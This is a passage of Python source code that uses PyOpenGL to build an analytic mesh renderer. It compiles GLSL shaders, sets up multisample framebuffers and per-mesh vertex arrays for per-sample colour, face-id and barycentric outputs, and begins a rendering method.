# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
textureIDs_mesh = textureIDs_mesh + [texture]
vbo_indices_mesh = vbo_indices_mesh + [vbo_indices]
vbo_colors_mesh = vbo_colors_mesh + [vbo_colors]
vbo_vertices_mesh = vbo_vertices_mesh + [vbo_verts]
vbo_uvs_mesh = vbo_uvs_mesh + [vbo_uvs]
vaos_mesh = vaos_mesh + [vao]
self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs_mesh]
self.vao_tex_mesh_list = self.vao_tex_mesh_list + [vaos_mesh]
self.vbo_indices_mesh_list = self.vbo_indices_mesh_list + [vbo_indices_mesh]
self.vbo_colors_mesh = self.vbo_colors_mesh + [vbo_colors_mesh]
self.vbo_verts_mesh = self.vbo_verts_mesh + [vbo_vertices_mesh]
self.vbo_uvs_mesh = self.vbo_uvs_mesh + [vbo_uvs_mesh]
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
def initGL_AnalyticRenderer(self):
self.initGLTexture()
self.updateRender = True
self.updateDerivatives = True
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 colorIn;
layout(location = 2) in vec2 vertexUV;
layout(location = 3) in uint face_id;
layout(location = 4) in vec3 barycentric;
uniform mat4 MVP;
out vec3 theColor;
out vec4 pos;
flat out uint face_out;
out vec3 barycentric_vert_out;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
pos = MVP * vec4(position,1);
//pos = pos4.xyz;
theColor = colorIn;
UV = vertexUV;
face_out = face_id;
barycentric_vert_out = barycentric;
}""", GL.GL_VERTEX_SHADER)
ERRORS_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
//layout(early_fragment_tests) in;
// Interpolated values from the vertex shaders
in vec3 theColor;
in vec2 UV;
flat in uint face_out;
in vec4 pos;
in vec3 barycentric_vert_out;
layout(location = 3) uniform sampler2D myTextureSampler;
uniform float ww;
uniform float wh;
// Ouput data
layout(location = 0) out vec3 color;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 barycentric1;
layout(location = 4) out vec2 barycentric2;
void main(){
vec3 finalColor = theColor * texture2D( myTextureSampler, UV).rgb;
color = finalColor.rgb;
sample_pos = ((0.5*pos.xy/pos.w) + 0.5)*vec2(ww,wh);
sample_face = face_out;
barycentric1 = barycentric_vert_out.xy;
barycentric2 = vec2(barycentric_vert_out.z, 0.);
}""", GL.GL_FRAGMENT_SHADER)
self.errorTextureProgram = shaders.compileProgram(VERTEX_SHADER, ERRORS_FRAGMENT_SHADER)
FETCH_VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
void main() {}
""", GL.GL_VERTEX_SHADER)
FETCH_GEOMETRY_SHADER = shaders.compileShader("""#version 330 core
layout(points) in;
layout(triangle_strip, max_vertices = 4) out;
const vec2 data[4] = vec2[]
(
vec2(-1.0, 1.0),
vec2(-1.0, -1.0),
vec2( 1.0, 1.0),
vec2( 1.0, -1.0)
);
void main() {
for (int i = 0; i < 4; ++i) {
gl_Position = vec4( data[i], 0.0, 1.0 );
EmitVertex();
}
EndPrimitive();
}""", GL.GL_GEOMETRY_SHADER)
FETCH_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
layout(location = 2) uniform sampler2DMS colors;
layout(location = 3) uniform sampler2DMS sample_positions;
layout(location = 4) uniform usampler2DMS sample_faces;
layout(location = 5) uniform sampler2DMS sample_barycentric_coords1;
layout(location = 6) uniform sampler2DMS sample_barycentric_coords2;
//layout(location = 7) uniform sampler2D imageGT;
uniform float ww;
uniform float wh;
uniform int sample;
// Ouput data
layout(location = 0) out vec3 colorFetchOut;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 sample_barycentric1;
layout(location = 4) out vec2 sample_barycentric2;
//layout(location = 5) out vec3 res;
//out int gl_SampleMask[];
const int all_sample_mask = 0xffff;
void main(){
ivec2 texcoord = ivec2(gl_FragCoord.xy);
colorFetchOut = texelFetch(colors, texcoord, sample).xyz;
sample_pos = texelFetch(sample_positions, texcoord, sample).xy;
sample_face = texelFetch(sample_faces, texcoord, sample).r;
sample_barycentric1 = texelFetch(sample_barycentric_coords1, texcoord, sample).xy;
sample_barycentric2 = texelFetch(sample_barycentric_coords2, texcoord, sample).xy;
//vec3 imgColor = texture2D(imageGT, gl_FragCoord.xy/vec2(ww,wh)).rgb;
//res = imgColor - colorFetchOut;
}""", GL.GL_FRAGMENT_SHADER)
GL.glClampColor(GL.GL_CLAMP_READ_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_VERTEX_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_FRAGMENT_COLOR, False)
self.fetchSamplesProgram = shaders.compileProgram(FETCH_VERTEX_SHADER, FETCH_GEOMETRY_SHADER, FETCH_FRAGMENT_SHADER)
self.textureGT = GL.GLuint(0)
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glGenTextures(1, self.textureGT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# #
# try:
# if self.imageGT.r is not None and self.imageGT.r.size != 0: #if GT image is defined.
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# except:
# pass
# GL.glGenTextures(1, self.textureEdges)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureEdges)
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glActiveTexture(GL.GL_TEXTURE0)
whitePixel = np.ones([1, 1, 3])
self.whitePixelTextureID = GL.GLuint(0)
GL.glGenTextures(1, self.whitePixelTextureID)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.whitePixelTextureID)
image = np.array(np.flipud((whitePixel)), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
self.fbo_ms_errors = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms_errors)
self.texture_errors_render = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
self.texture_errors_sample_position = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
self.texture_errors_sample_faces = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_R32UI, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces, 0)
#
self.texture_errors_sample_barycentric1 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1,
0)
self.texture_errors_sample_barycentric2 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2,
0)
self.z_buf_ms_errors = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'],
False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors, 0)
# self.z_buf_ms_errors = GL.glGenRenderbuffers(1)
# GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
# GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
# GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.fbo_sample_fetch = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_sample_fetch)
self.render_buffer_fetch_sample_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
self.render_buffer_fetch_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
self.render_buffer_fetch_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
#
self.render_buffer_fetch_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
self.render_buffer_fetch_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
self.z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
# FBO_f
self.fbo_errors_nonms = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_errors_nonms)
render_buf_errors_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, render_buf_errors_render)
render_buf_errors_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
render_buf_errors_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
#
render_buf_errors_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
render_buf_errors_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
#
z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.textureObjLoc = GL.glGetUniformLocation(self.errorTextureProgram, "myTextureSampler")
# Add background cube:
position_location = GL.glGetAttribLocation(self.errorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.errorTextureProgram, 'colorIn')
uvs_location = GL.glGetAttribLocation(self.errorTextureProgram, 'vertexUV')
face_ids_location = GL.glGetAttribLocation(self.errorTextureProgram, 'face_id')
barycentric_location = GL.glGetAttribLocation(self.errorTextureProgram, 'barycentric')
# self.vbo_verts_cube= vbo.VBO(np.array(self.v_bgCube).astype(np.float32))
# self.vbo_colors_cube= vbo.VBO(np.array(self.vc_bgCube).astype(np.float32))
# self.vbo_uvs_cube = vbo.VBO(np.array(self.ft_bgCube).astype(np.float32))
# self.vao_bgCube = GL.GLuint(0)
# GL.glGenVertexArrays(1, self.vao_bgCube)
#
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube = vbo.VBO(np.array(self.f_bgCube).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
# self.vbo_f_bgCube.bind()
# self.vbo_verts_cube.bind()
# GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_colors_cube.bind()
# GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_uvs_cube.bind()
# GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#
# f = self.f_bgCube
# fc = np.tile(np.arange(len(self.f), len(self.f) + len(f))[:, None], [1, 3]).ravel()
# # fc[:, 0] = fc[:, 0] & 255
# # fc[:, 1] = (fc[:, 1] >> 8) & 255
# # fc[:, 2] = (fc[:, 2] >> 16) & 255
# fc = np.asarray(fc, dtype=np.uint32)
# vbo_face_ids_cube = vbo.VBO(fc)
# vbo_face_ids_cube.bind()
# GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
# GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
#
# #Barycentric cube:
# f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
# vbo_barycentric_cube = vbo.VBO(f_barycentric)
# vbo_barycentric_cube.bind()
# GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_quad = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_quad)
GL.glBindVertexArray(self.vao_quad)
# Bind VAO
self.vbo_face_ids_list = []
self.vbo_barycentric_list = []
self.vao_errors_mesh_list = []
flen = 1
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_face_ids_mesh = []
vbo_barycentric_mesh = []
for polygons in np.arange(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_f.bind()
vbo_verts = self.vbo_verts_mesh[mesh][polygons]
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors = self.vbo_colors_mesh[mesh][polygons]
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_uvs = self.vbo_uvs_mesh[mesh][polygons]
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
f = self.f_list[mesh][polygons]
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
vbo_face_ids = vbo.VBO(fc)
vbo_face_ids.bind()
GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
vbo_barycentric = vbo.VBO(f_barycentric)
vbo_barycentric.bind()
GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
flen += len(f)
vaos_mesh += [vao]
vbo_face_ids_mesh += [vbo_face_ids]
vbo_barycentric_mesh += [vbo_face_ids]
GL.glBindVertexArray(0)
self.vbo_face_ids_list += [vbo_face_ids_mesh]
self.vbo_barycentric_list += [vbo_barycentric_mesh]
self.vao_errors_mesh_list += [vaos_mesh]
def render_image_buffers(self):
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
self.makeCurrentContext()
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1 % self.num_channels], self.bgcolor.r[2 % self.num_channels], 1.)
GL.glUseProgram(self.errorTextureProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3, GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
# GL.glClearBufferiv(GL.GL_COLOR, 0, 0)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
#ImageGT
GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glBindImageTexture(1,self.textureGT, 0, GL.GL_FALSE, 0, GL.GL_READ_ONLY, GL.GL_RGBA8)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
GL.glUniform1i(self.textureGTLoc, 1)
wwLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_errors_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
# vbo_color.bind()
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
assert (primtype == GL.GL_TRIANGLES)
# GL.glUseProgram(self.errorTextureProgram)
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
else:
texture = self.whitePixelTextureID
GL.glActiveTexture(GL.GL_TEXTURE0)
